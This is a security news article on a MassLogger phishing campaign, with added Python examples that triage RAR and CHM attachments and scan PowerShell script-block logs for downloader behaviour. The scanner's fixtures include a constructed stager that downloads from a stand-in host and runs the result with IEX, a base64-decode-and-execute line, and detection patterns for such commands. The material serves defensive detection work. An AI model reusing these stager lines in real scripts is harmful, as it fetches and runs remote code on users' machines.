Masslogger Trojan Enhanced to Capture All Your Outlook and Chrome Credentials

New Phishing Campaign Targets Credentials Using MassLogger Malware

A resurgence of the MassLogger malware has been detected, targeting credentials from major platforms including Microsoft Outlook, Google Chrome, and various instant messaging applications. This phishing campaign, aimed primarily at users in Turkey, Latvia, and Italy, began in mid-January and builds on earlier operations that targeted users in several European countries during late 2020. The malware is built to evade static analysis, and each new variant shows how persistently its operators refine their tooling.

MassLogger, a .NET-based credential stealer, was first identified in the wild in April 2020. Recent findings indicate that the attackers keep updating their variants both to circumvent detection and to improve monetization. According to Cisco Talos researchers, the latest campaign stands out for using the compiled HTML (CHM) help file format to start the infection chain, a departure from the group's previous tactics.

The phishing emails carry subject lines that look legitimate and business-related. One email targeting Turkish users, for instance, used the subject line “Domestic customer inquiry” and referred to an attached quote, while earlier lures were styled as a “memorandum of understanding” that the recipient was asked to sign. Whatever the theme, the emails carry attachments named in the multi-volume RAR convention (for example a .r00 volume) rather than with a plain .rar extension, so filters that key only on file extensions let the archives through.

Each RAR attachment holds a single compiled HTML help file. When opened it displays a benign message such as “Customer service,” but the file also embeds obfuscated JavaScript that builds an HTML page which launches a PowerShell downloader. That downloader connects to a legitimate server to retrieve the final payload, which in turn executes MassLogger and begins harvesting sensitive user data.
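The two evasion tricks above (a multi-volume RAR name that sidesteps ".rar" filters, and an archive whose only content is a CHM file) are both visible to a mail gateway that looks at the file name *and* the leading bytes rather than the extension alone. The following Python triage function is an added example written for this page, not code from Cisco Talos or from the campaign. The RAR and CHM magic bytes are properties of those file formats; the sample attachment names and header bytes are constructed for the demonstration and are not artefacts from the campaign.

```python
"""Triage e-mail attachments by name *and* content, never by extension alone."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Multi-volume RAR naming (a format convention, not something the article spells out):
#   old style: archive.rar, archive.r00, archive.r01, ...
#   new style: archive.part1.rar, archive.part2.rar, ...
MULTI_VOLUME_RE = re.compile(r"\.(?:r\d{2}|part\d+\.rar)$", re.IGNORECASE)

# File signatures: RAR 4.x, RAR 5.x and CHM (the "ITSF" header).
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
CHM_MAGIC = b"ITSF"


def sniff_type(data: bytes) -> str:
    """Classify content by its leading bytes; 'unknown' is not a clean bill of health."""
    if data.startswith(RAR5_MAGIC) or data.startswith(RAR4_MAGIC):
        return "rar"
    if data.startswith(CHM_MAGIC):
        return "chm"
    return "unknown"


def declared_type(filename: str) -> str:
    """What the file name claims the content is."""
    name = filename.lower()
    if name.endswith(".rar") or MULTI_VOLUME_RE.search(name):
        return "rar"
    if name.endswith(".chm"):
        return "chm"
    return "other"


@dataclass
class Verdict:
    filename: str
    declared: str
    actual: str
    multi_volume: bool
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def triage_attachment(filename: str, data: bytes) -> Verdict:
    """Flag the attachment when its name or its real content warrants a closer look."""
    v = Verdict(filename, declared_type(filename), sniff_type(data),
                bool(MULTI_VOLUME_RE.search(filename)))
    if v.multi_volume:
        v.reasons.append("multi-volume RAR name (.rNN / .partN.rar) that '.rar'-only filters miss")
    if v.actual == "chm":
        v.reasons.append("CHM content, which can carry script that runs when the file is opened")
    if v.actual == "rar":
        v.reasons.append("RAR archive content")
    if v.actual != "unknown" and v.declared != v.actual:
        v.reasons.append(f"name says '{v.declared}' but content is '{v.actual}'")
    return v


# Constructed samples (not real campaign files); a truncated header is enough to sniff.
SAMPLE_ATTACHMENTS = [
    ("inquiry.r00", RAR4_MAGIC + b"\x00" * 16),            # multi-volume name, genuine RAR
    ("Customer service.chm", CHM_MAGIC + b"\x03\x00\x00\x00"),
    ("quote.doc", RAR5_MAGIC + b"\x00" * 8),               # archive hiding behind a document name
    ("invoice.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),    # benign control
]


def triage_all(samples=SAMPLE_ATTACHMENTS) -> list[Verdict]:
    return [triage_attachment(name, data) for name, data in samples]


if __name__ == "__main__":
    for v in triage_all():
        state = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{v.filename:22} {state:10} {'; '.join(v.reasons)}")
```

In production the `sniff_type` table would be much longer and the archive would be opened to inspect its members, since the interesting signal here is "RAR whose only entry is a .chm"; the point of the example is that the decision is driven by content and by the naming convention together, so renaming `.rar` to `.r00` or `.doc` changes nothing.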

The latest iteration of MassLogger (version 3.0.7563.31381) possesses advanced capabilities, including the ability to extract credentials from various applications such as Discord, NordVPN, Thunderbird, and multiple Chromium-based browsers. Although MassLogger can function as a keylogger, researchers observed that this particular operation had disabled that feature, suggesting a targeted approach to data exfiltration.

Apart from the compiled HTML help file written to disk, the attack chain runs almost entirely in memory, which is why the researchers stress regular memory scanning as a defensive measure. They also recommend that organizations configure their systems to log PowerShell events, since script logging records the script content as it is actually executed and so exposes malicious code that file-based scanning never sees, whatever obfuscation was applied on the way in.
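Once Script Block Logging is on (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > "Turn on PowerShell Script Block Logging", which sets `EnableScriptBlockLogging` under `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging`), every executed block lands as event 4104 in the Microsoft-Windows-PowerShell/Operational log. The Python scanner below is an added example for this page, not Talos code; it shows the one detail that trips up naive searches over those events: a long script block is split across several 4104 records sharing a `ScriptBlockId`, numbered by `MessageNumber`/`MessageTotal`, so the records must be reassembled before pattern matching. The event records, the indicator list and the two-category threshold are constructed for the demonstration and should be tuned to your own environment.

```python
"""Scan PowerShell Script Block Logging (event 4104) records for downloader behaviour."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Indicator families. Any one of them is common in admin scripts; two or more in a
# single block is the shape of a one-line stager. Tune the threshold to your estate.
INDICATORS = {
    "web-download": re.compile(
        r"Net\.WebClient|DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Start-BitsTransfer",
        re.I),
    "inline-exec": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "encoding": re.compile(r"FromBase64String|-enc(?:odedcommand)?\b", re.I),
    "in-memory-load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "quiet-host": re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I),
}


@dataclass
class Finding:
    script_block_id: str
    path: str          # empty for blocks typed at a prompt or run from memory
    complete: bool     # False when some fragments have not (yet) been seen
    categories: list[str]


def reassemble(events: list[dict]) -> dict[str, dict]:
    """Join 4104 fragments per ScriptBlockId in MessageNumber order."""
    slots: dict[str, dict] = defaultdict(lambda: {"parts": {}, "total": 1, "path": ""})
    for e in events:
        slot = slots[e["ScriptBlockId"]]
        slot["parts"][int(e["MessageNumber"])] = e["ScriptBlockText"]
        slot["total"] = int(e["MessageTotal"])
        slot["path"] = slot["path"] or e.get("Path", "")
    blocks = {}
    for sbid, slot in slots.items():
        text = "".join(slot["parts"][n] for n in sorted(slot["parts"]))
        blocks[sbid] = {"text": text, "path": slot["path"],
                        "complete": len(slot["parts"]) == slot["total"]}
    return blocks


def scan_script_blocks(events: list[dict], min_categories: int = 2) -> list[Finding]:
    """Return one Finding per reassembled block that hits at least min_categories families."""
    findings = []
    for sbid, blk in reassemble(events).items():
        cats = [name for name, rx in INDICATORS.items() if rx.search(blk["text"])]
        if len(cats) >= min_categories:
            findings.append(Finding(sbid, blk["path"], blk["complete"], cats))
    return findings


# Constructed 4104 EventData records (not real telemetry). Only the fields the scanner
# needs are kept; the hostnames use the reserved .invalid TLD. Block b2 arrives as three
# fragments, out of order, with the indicators cut across the fragment boundaries.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem 'C:\\Users' -Recurse | Measure-Object",
     "Path": "C:\\scripts\\inventory.ps1"},
    {"ScriptBlockId": "d4", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-WebRequest -Uri 'https://updates.example.invalid/manifest.json' "
                        "-OutFile 'C:\\temp\\manifest.json'",
     "Path": "C:\\scripts\\update-check.ps1"},
    {"ScriptBlockId": "b2", "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "EX $s", "Path": ""},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$u='http://stage.example.invalid/loader.txt'; "
                        "$c=New-Object Net.WebClient; $s=$c.Download", "Path": ""},
    {"ScriptBlockId": "b2", "MessageNumber": 2, "MessageTotal": 3,
     "ScriptBlockText": "String($u); I", "Path": ""},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob)); "
                        "Invoke-Expression $s", "Path": ""},
]


if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_EVENTS):
        src = f.path or "<no file: interactive or in-memory>"
        print(f"{f.script_block_id} complete={f.complete} {f.categories} {src}")
```

Two design points worth noting. Scanning each fragment of `b2` on its own produces nothing, because `DownloadString` and `IEX` are split across records; only the reassembled block trips both families. And an empty `Path` is itself a useful signal for a campaign like this one, where nothing but the CHM ever touches disk: a block with downloader indicators and no backing file is exactly what a memory-resident loader looks like in the event log.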

In conclusion, the resurgence of MassLogger serves as a reminder of the dynamic nature of cyber threats. Business owners, especially those engaged with remote work and digital communications, must remain vigilant against such sophisticated phishing schemes. Utilizing frameworks like the MITRE ATT&CK matrix can further inform organizational defenses against tactics such as initial access and data exfiltration employed in these ongoing cyber campaigns.
